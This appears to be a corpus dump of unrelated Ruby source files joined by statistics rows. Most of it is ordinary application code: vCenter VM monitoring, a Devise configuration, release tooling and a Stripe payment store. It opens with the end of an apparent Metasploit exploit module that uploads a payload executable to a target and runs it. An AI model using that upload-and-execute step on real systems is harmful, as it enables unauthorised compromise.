end
pl_content = pl_exe.unpack('H*').join()
print_status("Uploading exploit to #{payload_exe}, and executing it.")
upload_exec(command, payload_exe, pl_content)
handler
end
end
| 30.687805 | 142 | 0.595772 |
21210560dfb0fc14c97296e7a4b2ef983c29d1a6 | 237 | class StaffMemberFormPresenter < UserFormPresenter
def suspended_check_box
markup(:div, class: "check-boxes") do |m|
m << check_box(:suspended)
m << label(:suspended, "アカウント停止")
end
end
end | 29.625 | 50 | 0.611814 |
5d3ab603e0a0ee4b2db921c3bf486b0f4b623077 | 1,690 | # frozen_string_literal: true
module ReleaseTools
module Tasks
module AutoDeploy
class Prepare
include ::SemanticLogger::Loggable
def execute
check_version
prepare_monthly_release
results = create_branches
notify_results(results)
end
def prepare_monthly_release
logger.info('Preparing the monthly release issue', version: version)
Release::Prepare.new(version).execute
end
def create_branches
logger.info('Creating the auto-deploy branches', branch: branch)
ReleaseTools::Services::AutoDeployBranchService
.new(branch)
.create_branches!
end
def notify_results(results)
logger.info('Notifying the operation results on slack')
ReleaseTools::Slack::AutoDeployNotification.on_create(results)
end
def auto_deploy_naming
@auto_deploy_naming ||= ReleaseTools::AutoDeploy::Naming.new
end
def branch
@branch ||= auto_deploy_naming.branch
end
def version
auto_deploy_naming.version
end
# Validates if the active version can be retrieved.
#
# A valid version is a hard requirement for this task,
# in case it cannot be retrieved we should fail the task
# with a meaningful error message
#
# @raise [RuntimeError] if `version` is nil
def check_version
return unless version.nil?
logger.fatal('Cannot detect the active version')
raise 'Cannot detect the active version'
end
end
end
end
end
| 26 | 78 | 0.619527 |
3970fa39c0c1a018e340a4699fbd190c0041ff6f | 17,061 | # -------------------------------------------------------------------------- #
# Copyright 2002-2019, OpenNebula Project, OpenNebula Systems #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain #
# a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#--------------------------------------------------------------------------- #
module VirtualMachineMonitor
POLL_ATTRIBUTE = OpenNebula::VirtualMachine::Driver::POLL_ATTRIBUTE
VM_STATE = OpenNebula::VirtualMachine::Driver::VM_STATE
# Converts the VI string state to OpenNebula state convention
# Guest states are:
# - poweredOff The virtual machine is currently powered off.
# - poweredOn The virtual machine is currently powered on.
# - suspended The virtual machine is currently suspended.
def state_to_c(state)
case state
when 'poweredOn'
VM_STATE[:active]
when 'suspended'
VM_STATE[:paused]
when 'poweredOff'
VM_STATE[:deleted]
else
VM_STATE[:unknown]
end
end
# monitor function used when VMM poll action is called
# rubocop:disable Naming/VariableName
# rubocop:disable Style/FormatStringToken
def monitor_poll_vm
reset_monitor
return unless get_vm_id
@state = state_to_c(self['summary.runtime.powerState'])
if @state != OpenNebula::VirtualMachine::Driver::VM_STATE[:active]
reset_monitor
return
end
cpuMhz = self['runtime.host.summary.hardware.cpuMhz'].to_f
@monitor[:used_memory] = self['summary.quickStats.hostMemoryUsage'] *
1024
used_cpu = self['summary.quickStats.overallCpuUsage'].to_f / cpuMhz
used_cpu = (used_cpu * 100).to_s
@monitor[:used_cpu] = format('%.2f', used_cpu).to_s
# Check for negative values
@monitor[:used_memory] = 0 if @monitor[:used_memory].to_i < 0
@monitor[:used_cpu] = 0 if @monitor[:used_cpu].to_i < 0
guest_ip_addresses = []
unless self['guest.net'].empty?
self['guest.net'].each do |net|
next unless net.ipConfig
next if net.ipConfig.ipAddress.empty?
net.ipConfig.ipAddress.each do |ip|
guest_ip_addresses << ip.ipAddress
end
end
end
@guest_ip_addresses = guest_ip_addresses.join(',')
pm = self['_connection'].serviceInstance.content.perfManager
provider = pm.provider_summary(@item)
refresh_rate = provider.refreshRate
stats = {}
if one_item['MONITORING/LAST_MON'] &&
one_item['MONITORING/LAST_MON'].to_i != 0
# Real time data stores max 1 hour. 1 minute has 3 samples
interval = (Time.now.to_i -
one_item['MONITORING/LAST_MON'].to_i)
# If last poll was more than hour ago get 3 minutes,
# else calculate how many samples since last poll
if interval > 3600
samples = 9
else
samples = (interval / refresh_rate) + 1
end
samples > 0 ? max_samples = samples : max_samples = 1
stats = pm.retrieve_stats(
[@item],
['net.transmitted', 'net.bytesRx', 'net.bytesTx',
'net.received', 'virtualDisk.numberReadAveraged',
'virtualDisk.numberWriteAveraged', 'virtualDisk.read',
'virtualDisk.write'],
interval => refresh_rate, max_samples => max_samples
) rescue {}
else
# First poll, get at least latest 3 minutes = 9 samples
stats = pm.retrieve_stats(
[@item],
['net.transmitted', 'net.bytesRx', 'net.bytesTx',
'net.received', 'virtualDisk.numberReadAveraged',
'virtualDisk.numberWriteAveraged', 'virtualDisk.read',
'virtualDisk.write'],
interval => refresh_rate, max_samples => 9
) rescue {}
end
if !stats.empty? && !stats.first[1][:metrics].empty?
metrics = stats.first[1][:metrics]
nettx_kbpersec = 0
if metrics['net.transmitted']
metrics['net.transmitted'].each do |sample|
nettx_kbpersec += sample if sample > 0
end
end
netrx_kbpersec = 0
if metrics['net.bytesRx']
metrics['net.bytesRx'].each do |sample|
netrx_kbpersec += sample if sample > 0
end
end
read_kbpersec = 0
if metrics['virtualDisk.read']
metrics['virtualDisk.read'].each do |sample|
read_kbpersec += sample if sample > 0
end
end
read_iops = 0
if metrics['virtualDisk.numberReadAveraged']
metrics['virtualDisk.numberReadAveraged'].each do |sample|
read_iops += sample if sample > 0
end
end
write_kbpersec = 0
if metrics['virtualDisk.write']
metrics['virtualDisk.write'].each do |sample|
write_kbpersec += sample if sample > 0
end
end
write_iops = 0
if metrics['virtualDisk.numberWriteAveraged']
metrics['virtualDisk.numberWriteAveraged'].each do |sample|
write_iops += sample if sample > 0
end
end
else
nettx_kbpersec = 0
netrx_kbpersec = 0
read_kbpersec = 0
read_iops = 0
write_kbpersec = 0
write_iops = 0
end
# Accumulate values if present
if @one_item && @one_item['MONITORING/NETTX']
previous_nettx = @one_item['MONITORING/NETTX'].to_i
else
previous_nettx = 0
end
if @one_item && @one_item['MONITORING/NETRX']
previous_netrx = @one_item['MONITORING/NETRX'].to_i
else
previous_netrx = 0
end
if @one_item && @one_item['MONITORING/DISKRDIOPS']
previous_diskrdiops = @one_item['MONITORING/DISKRDIOPS'].to_i
else
previous_diskrdiops = 0
end
if @one_item && @one_item['MONITORING/DISKWRIOPS']
previous_diskwriops = @one_item['MONITORING/DISKWRIOPS'].to_i
else
previous_diskwriops = 0
end
if @one_item && @one_item['MONITORING/DISKRDBYTES']
previous_diskrdbytes = @one_item['MONITORING/DISKRDBYTES'].to_i
else
previous_diskrdbytes = 0
end
if @one_item && @one_item['MONITORING/DISKWRBYTES']
previous_diskwrbytes = @one_item['MONITORING/DISKWRBYTES'].to_i
else
previous_diskwrbytes = 0
end
@monitor[:nettx] = previous_nettx +
(nettx_kbpersec * 1024 * refresh_rate).to_i
@monitor[:netrx] = previous_netrx +
(netrx_kbpersec * 1024 * refresh_rate).to_i
@monitor[:diskrdiops] = previous_diskrdiops + read_iops
@monitor[:diskwriops] = previous_diskwriops + write_iops
@monitor[:diskrdbytes] = previous_diskrdbytes +
(read_kbpersec * 1024 * refresh_rate).to_i
@monitor[:diskwrbytes] = previous_diskwrbytes +
(write_kbpersec * 1024 * refresh_rate).to_i
end
# monitor function used when poll action is called for all vms
def monitor(stats)
reset_monitor
refresh_rate = 20 # 20 seconds between samples (realtime)
@state = state_to_c(@vm_info['summary.runtime.powerState'])
return if @state != VM_STATE[:active]
cpuMhz = @vm_info[:esx_host_cpu]
@monitor[:used_memory] = @vm_info['summary.quickStats.hostMemoryUsage']
.to_i * 1024
used_cpu = @vm_info['summary.quickStats.overallCpuUsage'].to_f / cpuMhz
used_cpu = (used_cpu * 100).to_s
@monitor[:used_cpu] = format('%.2f', used_cpu).to_s
# Check for negative values
@monitor[:used_memory] = 0 if @monitor[:used_memory].to_i < 0
@monitor[:used_cpu] = 0 if @monitor[:used_cpu].to_i < 0
guest_ip_addresses = []
unless self['guest.net'].empty?
@vm_info['guest.net'].each do |net|
next unless net.ipConfig
next if net.ipConfig.ipAddress.empty?
net.ipConfig.ipAddress.each do |ip|
guest_ip_addresses << ip.ipAddress
end
end
end
@guest_ip_addresses = guest_ip_addresses.join(',')
if stats.key?(@item)
metrics = stats[@item][:metrics]
nettx_kbpersec = 0
if metrics['net.transmitted']
metrics['net.transmitted'].each do |sample|
nettx_kbpersec += sample if sample > 0
end
end
netrx_kbpersec = 0
if metrics['net.bytesRx']
metrics['net.bytesRx'].each do |sample|
netrx_kbpersec += sample if sample > 0
end
end
read_kbpersec = 0
if metrics['virtualDisk.read']
metrics['virtualDisk.read'].each do |sample|
read_kbpersec += sample if sample > 0
end
end
read_iops = 0
if metrics['virtualDisk.numberReadAveraged']
metrics['virtualDisk.numberReadAveraged'].each do |sample|
read_iops += sample if sample > 0
end
end
write_kbpersec = 0
if metrics['virtualDisk.write']
metrics['virtualDisk.write'].each do |sample|
write_kbpersec += sample if sample > 0
end
end
write_iops = 0
if metrics['virtualDisk.numberWriteAveraged']
metrics['virtualDisk.numberWriteAveraged'].each do |sample|
write_iops += sample if sample > 0
end
end
else
nettx_kbpersec = 0
netrx_kbpersec = 0
read_kbpersec = 0
read_iops = 0
write_kbpersec = 0
write_iops = 0
end
# Accumulate values if present
if @one_item && @one_item['MONITORING/NETTX']
previous_nettx = @one_item['MONITORING/NETTX'].to_i
else
previous_nettx = 0
end
if @one_item && @one_item['MONITORING/NETRX']
previous_netrx = @one_item['MONITORING/NETRX'].to_i
else
previous_netrx = 0
end
if @one_item && @one_item['MONITORING/DISKRDIOPS']
previous_diskrdiops = @one_item['MONITORING/DISKRDIOPS'].to_i
else
previous_diskrdiops = 0
end
if @one_item && @one_item['MONITORING/DISKWRIOPS']
previous_diskwriops = @one_item['MONITORING/DISKWRIOPS'].to_i
else
previous_diskwriops = 0
end
if @one_item && @one_item['MONITORING/DISKRDBYTES']
previous_diskrdbytes = @one_item['MONITORING/DISKRDBYTES'].to_i
else
previous_diskrdbytes = 0
end
if @one_item && @one_item['MONITORING/DISKWRBYTES']
previous_diskwrbytes = @one_item['MONITORING/DISKWRBYTES'].to_i
else
previous_diskwrbytes = 0
end
@monitor[:nettx] = previous_nettx +
(nettx_kbpersec * 1024 * refresh_rate).to_i
@monitor[:netrx] = previous_netrx +
(netrx_kbpersec * 1024 * refresh_rate).to_i
@monitor[:diskrdiops] = previous_diskrdiops + read_iops
@monitor[:diskwriops] = previous_diskwriops + write_iops
@monitor[:diskrdbytes] = previous_diskrdbytes +
(read_kbpersec * 1024 * refresh_rate).to_i
@monitor[:diskwrbytes] = previous_diskwrbytes +
(write_kbpersec * 1024 * refresh_rate).to_i
end
# rubocop:enable Naming/VariableName
# rubocop:enable Style/FormatStringToken
# Generates a OpenNebula IM Driver valid string with the monitor info
def info
return 'STATE=d' if @state == 'd'
if @vm_info
guest_ip = @vm_info['guest.ipAddress']
else
guest_ip = self['guest.ipAddress']
end
used_cpu = @monitor[:used_cpu]
used_memory = @monitor[:used_memory]
netrx = @monitor[:netrx]
nettx = @monitor[:nettx]
diskrdbytes = @monitor[:diskrdbytes]
diskwrbytes = @monitor[:diskwrbytes]
diskrdiops = @monitor[:diskrdiops]
diskwriops = @monitor[:diskwriops]
if @vm_info
esx_host = @vm_info[:esx_host_name].to_s
else
esx_host = self['runtime.host.name'].to_s
end
if @vm_info
guest_state = @vm_info['guest.guestState'].to_s
else
guest_state = self['guest.guestState'].to_s
end
if @vm_info
vmware_tools = @vm_info['guest.toolsRunningStatus'].to_s
else
vmware_tools = self['guest.toolsRunningStatus'].to_s
end
if @vm_info
vmtools_ver = @vm_info['guest.toolsVersion'].to_s
else
vmtools_ver = self['guest.toolsVersion'].to_s
end
if @vm_info
vmtools_verst = @vm_info['guest.toolsVersionStatus2'].to_s
else
vmtools_verst = self['guest.toolsVersionStatus2'].to_s
end
if @vm_info
# rp_name = @vm_info[:rp_list]
# .select {|item|
# item[:ref] == @vm_info['resourcePool']._ref
# }.first[:name] rescue ''
rp_name = @vm_info[:rp_list]
.select do |item|
item[:ref] == @vm_info['resourcePool']._ref
end
.first[:name] rescue ''
rp_name = 'Resources' if rp_name.empty?
else
rp_name = self['resourcePool'].name
end
str_info = ''
str_info = 'GUEST_IP=' << guest_ip.to_s << ' ' if guest_ip
if @guest_ip_addresses && !@guest_ip_addresses.empty?
str_info << 'GUEST_IP_ADDRESSES="' << @guest_ip_addresses.to_s \
<< '" '
end
str_info << "#{POLL_ATTRIBUTE[:state]}=" << @state << ' '
str_info << "#{POLL_ATTRIBUTE[:cpu]}=" << used_cpu.to_s << ' '
str_info << "#{POLL_ATTRIBUTE[:memory]}=" << used_memory.to_s << ' '
str_info << "#{POLL_ATTRIBUTE[:netrx]}=" << netrx.to_s << ' '
str_info << "#{POLL_ATTRIBUTE[:nettx]}=" << nettx.to_s << ' '
str_info << 'DISKRDBYTES=' << diskrdbytes.to_s << ' '
str_info << 'DISKWRBYTES=' << diskwrbytes.to_s << ' '
str_info << 'DISKRDIOPS=' << diskrdiops.to_s << ' '
str_info << 'DISKWRIOPS=' << diskwriops.to_s << ' '
str_info << 'VCENTER_ESX_HOST="' << esx_host << '" '
str_info << 'VCENTER_GUEST_STATE=' << guest_state << ' '
str_info << 'VCENTER_VMWARETOOLS_RUNNING_STATUS=' << vmware_tools << ' '
str_info << 'VCENTER_VMWARETOOLS_VERSION=' << vmtools_ver << ' '
str_info << 'VCENTER_VMWARETOOLS_VERSION_STATUS=' \
<< vmtools_verst << ' '
str_info << 'VCENTER_RP_NAME="' << rp_name << '" '
end
def reset_monitor
@monitor = {
:used_cpu => 0,
:used_memory => 0,
:netrx => 0,
:nettx => 0,
:diskrdbytes => 0,
:diskwrbytes => 0,
:diskrdiops => 0,
:diskwriops => 0
}
end
end
| 35.767296 | 80 | 0.529805 |
e8d45ca55f49abdd4fffb1ea8f7d67607fea7815 | 15,190 | # frozen_string_literal: true
# Assuming you have not yet modified this file, each configuration option below
# is set to its default value. Note that some are commented out while others
# are not: uncommented lines are intended to protect your configuration from
# breaking changes in upgrades (i.e., in the event that future versions of
# Devise change the default values for those options).
#
# Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# Devise will use the `secret_key_base` as its `secret_key`
# by default. You can change it below and use your own secret key.
# config.secret_key = '594e6c2879591ab9b9e80b1de407b86398c2edb1bfbc4d12ce366b3f6226c501d643403ba626e8a48d3dd9d9abb0e819f8cef92447900dd6a632b2cfdc2cdc3a'
# ==> Controller configuration
# Configure the parent class to the devise controllers.
# config.parent_controller = 'DeviseController'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# Configure the parent class responsible to send e-mails.
# config.parent_mailer = 'ActionMailer::Base'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [:email]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [:email]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [:email]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication.
# For API-only applications to support authentication "out-of-the-box", you will likely want to
# enable this with :database unless you are using a custom strategy.
# The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
# Notice that if you are skipping storage for all authentication paths, you
# may want to disable generating routes to Devise's sessions controller by
# passing skip: :sessions to `devise_for` in your config/routes.rb
config.skip_session_storage = [:http_auth]
# By default, Devise cleans up the CSRF token on authentication to
# avoid CSRF token fixation attacks. This means that, when using AJAX
# requests for sign in and sign up, you need to get a new CSRF token
# from the server. You can disable this option at your own risk.
# config.clean_up_csrf_token_on_authentication = true
# When false, Devise will not attempt to reload routes on eager load.
# This can reduce the time taken to boot the app but if your application
# requires the Devise mappings to be loaded during boot time the application
# won't boot properly.
# config.reload_routes = true
# ==> Configuration for :database_authenticatable
# For bcrypt, this is the cost for hashing the password and defaults to 12. If
# using other algorithms, it sets how many times you want the password to be hashed.
# The number of stretches used for generating the hashed password are stored
# with the hashed password. This allows you to change the stretches without
# invalidating existing passwords.
#
# Limiting the stretches to just one in testing will increase the performance of
# your test suite dramatically. However, it is STRONGLY RECOMMENDED to not use
# a value less than 10 in other environments. Note that, for bcrypt (the default
# algorithm), the cost increases exponentially with the number of stretches (e.g.
# a value of 20 is already extremely slow: approx. 60 seconds for 1 calculation).
config.stretches = Rails.env.test? ? 1 : 12
# Set up a pepper to generate the hashed password.
# config.pepper = '303582101f77b817beb3e668c200befea6dd310f17eaa8b47cfc542d61a1d3d53e9b2a350ae8453ae5a033f865785690e886deee864220bcbf58092d95d1980b'
# Send a notification to the original email when the user's email is changed.
# config.send_email_changed_notification = false
# Send a notification email when the user's password is changed.
# config.send_password_change_notification = false
# ==> Configuration for :confirmable
# A period that the user is allowed to access the website even without
# confirming their account. For instance, if set to 2.days, the user will be
# able to access the website for two days without confirming their account,
# access will be blocked just in the third day.
# You can also set it to nil, which will allow the user to access the website
# without confirming their account.
# Default is 0.days, meaning the user cannot access the website without
# confirming their account.
# config.allow_unconfirmed_access_for = 2.days
# A period that the user is allowed to confirm their account before their
# token becomes invalid. For example, if set to 3.days, the user can confirm
# their account within 3 days after the mail was sent, but on the fourth day
# their account can't be confirmed with the token any more.
# Default is nil, meaning there is no restriction on how long a user can take
# before confirming their account.
# config.confirm_within = 3.days
# If true, requires any email changes to be confirmed (exactly the same way as
# initial account confirmation) to be applied. Requires additional unconfirmed_email
# db field (see migrations). Until confirmed, new email is stored in
# unconfirmed_email column, and copied to email column on successful confirmation.
config.reconfirmable = true
# Defines which key will be used when confirming an account
# config.confirmation_keys = [:email]
# ==> Configuration for :rememberable
# The time the user will be remembered without asking for credentials again.
# config.remember_for = 2.weeks
# Invalidates all the remember me tokens when the user signs out.
config.expire_all_remember_me_on_sign_out = true
# If true, extends the user's remember period when remembered via cookie.
# config.extend_remember_period = false
# Options to be passed to the created cookie. For instance, you can set
# secure: true in order to force SSL only cookies.
# config.rememberable_options = {}
# ==> Configuration for :validatable
# Range for password length.
config.password_length = 6..128
# Email regex used to validate email formats. It simply asserts that
# one (and only one) @ exists in the given string. This is mainly
# to give user feedback and not to assert the e-mail validity.
config.email_regexp = /\A[^@\s]+@[^@\s]+\z/
# ==> Configuration for :timeoutable
# The time you want to timeout the user session without activity. After this
# time the user will be asked for credentials again. Default is 30 minutes.
# config.timeout_in = 30.minutes
# ==> Configuration for :lockable
# Defines which strategy will be used to lock an account.
# :failed_attempts = Locks an account after a number of failed attempts to sign in.
# :none = No lock strategy. You should handle locking by yourself.
# config.lock_strategy = :failed_attempts
# Defines which key will be used when locking and unlocking an account
# config.unlock_keys = [:email]
# Defines which strategy will be used to unlock an account.
# :email = Sends an unlock link to the user email
# :time = Re-enables login after a certain amount of time (see :unlock_in below)
# :both = Enables both strategies
# :none = No unlock strategy. You should handle unlocking by yourself.
# config.unlock_strategy = :both
# Number of authentication tries before locking an account if lock_strategy
# is failed attempts.
# config.maximum_attempts = 20
# Time interval to unlock the account if :time is enabled as unlock_strategy.
# config.unlock_in = 1.hour
# Warn on the last attempt before the account is locked.
# config.last_attempt_warning = true
# ==> Configuration for :recoverable
#
# Defines which key will be used when recovering the password for an account
# config.reset_password_keys = [:email]
# Time interval you can reset your password with a reset password key.
# Don't put a too small interval or your users won't have the time to
# change their passwords.
config.reset_password_within = 6.hours
# When set to false, does not sign a user in automatically after their password is
# reset. Defaults to true, so a user is signed in automatically after a reset.
# config.sign_in_after_reset_password = true
# ==> Configuration for :encryptable
# Allow you to use another hashing or encryption algorithm besides bcrypt (default).
# You can use :sha1, :sha512 or algorithms from others authentication tools as
# :clearance_sha1, :authlogic_sha512 (then you should set stretches above to 20
# for default behavior) and :restful_authentication_sha1 (then you should set
# stretches to 10, and copy REST_AUTH_SITE_KEY to pepper).
#
# Require the `devise-encryptable` gem when using anything other than bcrypt
# config.encryptor = :sha512
# ==> Scopes configuration
# Turn scoped views on. Before rendering "sessions/new", it will first check for
# "users/sessions/new". It's turned off by default because it's slower if you
# are using only default views.
# config.scoped_views = false
# Configure the default scope given to Warden. By default it's the first
# devise role declared in your routes (usually :user).
# config.default_scope = :user
# Set this configuration to false if you want /users/sign_out to sign out
# only the current scope. By default, Devise signs out all scopes.
# config.sign_out_all_scopes = true
# ==> Navigation configuration
# Lists the formats that should be treated as navigational. Formats like
# :html, should redirect to the sign in page when the user does not have
# access, but formats like :xml or :json, should return 401.
#
# If you have any extra navigational formats, like :iphone or :mobile, you
# should add them to the navigational formats lists.
#
# The "*/*" below is required to match Internet Explorer requests.
# config.navigational_formats = ['*/*', :html]
# The default HTTP method used to sign out a resource. Default is :delete.
config.sign_out_via = :delete
# ==> OmniAuth
# Add a new OmniAuth provider. Check the wiki for more information on setting
# up on your models and hooks.
# config.omniauth :github, 'APP_ID', 'APP_SECRET', scope: 'user,public_repo'
# ==> Warden configuration
# If you want to use other strategies, that are not supported by Devise, or
# change the failure app, you can configure them inside the config.warden block.
#
# config.warden do |manager|
# manager.intercept_401 = false
# manager.default_strategies(scope: :user).unshift :some_external_strategy
# end
# ==> Mountable engine configurations
# When using Devise inside an engine, let's call it `MyEngine`, and this engine
# is mountable, there are some extra configurations to be taken into account.
# The following options are available, assuming the engine is mounted as:
#
# mount MyEngine, at: '/my_engine'
#
# The router that invoked `devise_for`, in the example above, would be:
# config.router_name = :my_engine
#
# When using OmniAuth, Devise cannot automatically set OmniAuth path,
# so you need to do it manually. For the users scope, it would be:
# config.omniauth_path_prefix = '/my_engine/users/auth'
# ==> Turbolinks configuration
# If your app is using Turbolinks, Turbolinks::Controller needs to be included to make redirection work correctly:
#
# ActiveSupport.on_load(:devise_failure_app) do
# include Turbolinks::Controller
# end
# ==> Configuration for :registerable
# When set to false, does not sign a user in automatically after their password is
# changed. Defaults to true, so a user is signed in automatically after changing a password.
# config.sign_in_after_change_password = true
end
| 48.685897 | 154 | 0.752535 |
bb7931c8a7af0857bbb96cad036c7190b847a7c3 | 4,798 | require 'coveralls'
Coveralls.wear!
# This file was generated by the `rails generate rspec:install` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# This option will default to `:apply_to_host_groups` in RSpec 4 (and will
# have no way to turn it off -- the option exists only for backwards
# compatibility in RSpec 3). It causes shared context metadata to be
# inherited by the metadata hash of host groups and examples, rather than
# triggering implicit auto-inclusion in groups with matching metadata.
config.shared_context_metadata_behavior = :apply_to_host_groups
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
=begin
# This allows you to limit a spec run to individual examples or groups
# you care about by tagging them with `:focus` metadata. When nothing
# is tagged with `:focus`, all examples get run. RSpec also provides
# aliases for `it`, `describe`, and `context` that include `:focus`
# metadata: `fit`, `fdescribe` and `fcontext`, respectively.
config.filter_run_when_matching :focus
# Allows RSpec to persist some state between runs in order to support
# the `--only-failures` and `--next-failure` CLI options. We recommend
# you configure your source control system to ignore this file.
config.example_status_persistence_file_path = "spec/examples.txt"
# Limits the available syntax to the non-monkey patched syntax that is
# recommended. For more details, see:
# - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/
# - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode
config.disable_monkey_patching!
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = "doc"
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
=end
end
| 47.98 | 92 | 0.74406 |
e2993351310aefe0403105112b83fa5c625dd6fc | 2,740 | module StripeService::Store::StripePayment
StripePaymentModel = ::StripePayment
InitialPaymentData = EntityUtils.define_builder(
[:community_id, :mandatory, :fixnum],
[:transaction_id, :mandatory, :fixnum],
[:payer_id, :mandatory, :string],
[:receiver_id, :mandatory, :string],
[:status, const_value: :pending],
[:currency, :mandatory, :string],
[:sum_cents, :fixnum],
[:authenticate_cents, :fixnum],
[:commission_cents, :fixnum],
[:buyer_commission_cents, :fixnum],
[:fee_cents, :fixnum],
[:subtotal_cents, :fixnum],
[:stripe_charge_id, :string]
)
StripePayment = EntityUtils.define_builder(
[:community_id, :mandatory, :fixnum],
[:transaction_id, :mandatory, :fixnum],
[:payer_id, :mandatory, :string],
[:receiver_id, :mandatory, :string],
[:status, :mandatory, :to_symbol],
[:sum, :money],
[:commission, :money],
[:authenticate, :money],
[:buyer_commission, :money],
[:fee, :money],
[:real_fee, :money],
[:subtotal, :money],
[:stripe_charge_id, :string],
[:stripe_transfer_id, :string],
[:transfered_at, :time],
[:available_on, :time]
)
module_function
def update(opts)
if(opts[:data].nil?)
raise ArgumentError.new("No data provided")
end
payment = find_payment(opts)
old_data = from_model(payment)
update_payment!(payment, opts[:data])
end
def create(community_id, transaction_id, order)
payment_data = InitialPaymentData.call(order.merge({community_id: community_id, transaction_id: transaction_id}))
model = StripePaymentModel.create!(payment_data)
from_model(model)
end
def get(community_id, transaction_id)
Maybe(StripePaymentModel.where(
community_id: community_id,
transaction_id: transaction_id
).first)
.map { |model| from_model(model) }
.or_else(nil)
end
def from_model(stripe_payment)
hash = HashUtils.compact(
EntityUtils.model_to_hash(stripe_payment).merge({
sum: stripe_payment.sum,
fee: stripe_payment.fee,
commission: stripe_payment.commission,
authenticate: stripe_payment.authenticate,
buyer_commission: stripe_payment.buyer_commission,
subtotal: stripe_payment.subtotal,
real_fee: stripe_payment.real_fee
}))
StripePayment.call(hash)
end
def find_payment(opts)
StripePaymentModel.where(
"(community_id = ? and transaction_id = ?)",
opts[:community_id],
opts[:transaction_id]
).first
end
def data_changed?(old_data, new_data)
old_data != new_data
end
def update_payment!(payment, data)
payment.update!(data)
from_model(payment.reload)
end
end
| 27.959184 | 117 | 0.666423 |
e83654c9197baa0b456b76d83b5cec26d5b13cc2 | 352 | class LoginPage < SitePrism::Page
set_url '/mercurysignon.php'
